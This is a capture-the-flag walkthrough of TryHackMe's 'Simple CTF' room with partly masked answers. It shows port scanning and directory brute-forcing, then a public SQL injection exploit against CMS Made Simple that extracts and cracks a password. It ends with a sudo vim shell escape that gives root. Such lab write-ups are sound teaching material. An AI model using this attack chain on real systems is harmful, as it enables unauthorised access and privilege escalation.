Hi, my name is Vitalii Rudnykh 👋

Jun 19, 2022

📝 TryHackMe. Walkthrough: Simple CTF

How many services are running under port 1000?

$ nmap -A
21/tcp   open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

Answer: *

What is running on the higher port?

Answer: s**

What’s the CVE you’re using against the application?

Let’s try to brute the directories on the web server.

$ python3 dirsearch.py -u
[13:47:22] 200 -  929B  - /robots.txt
[13:47:26] 301 -  313B  - /simple  ->

In the directory /simple/ there is a website, the caption at the footer says that it runs on CMS Make Simple version 2.2.8.

This site is powered by CMS Made Simple version 2.2.8

Trying to find available exploits through searchsploit.

$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                            | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                  | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                    | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)        | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                     | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                    | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                   | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                   | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection                                        | php/webapps/46635.py

$ searchsploit -m 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text

SQLi is good for us.

Answer: CVE-2019-****

To what kind of vulnerability is the application vulnerable?

Answer: sq**

What’s the password?

$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.

$ python 46635.py -u --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Where can you login with the details obtained?

With these credentials we can try to connect to SSH.

Answer: s*h

What’s the user flag?

Read the file in your home directory.

Answer: ***d **b, ke** u*!

Is there any other user in the home directory? What’s its name?

ls -la /home/

Answer: su****h

What can you leverage to spawn a privileged shell?

Let’s check what privileges we have for sudo.

$ sudo --list
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Answer: **m

What’s the root flag?

Get a root shell through sudo.

sudo vim -c ':!/bin/sh'

And read the file with the flag in the /root/ directory.

Answer: W*** d***. **u **** ***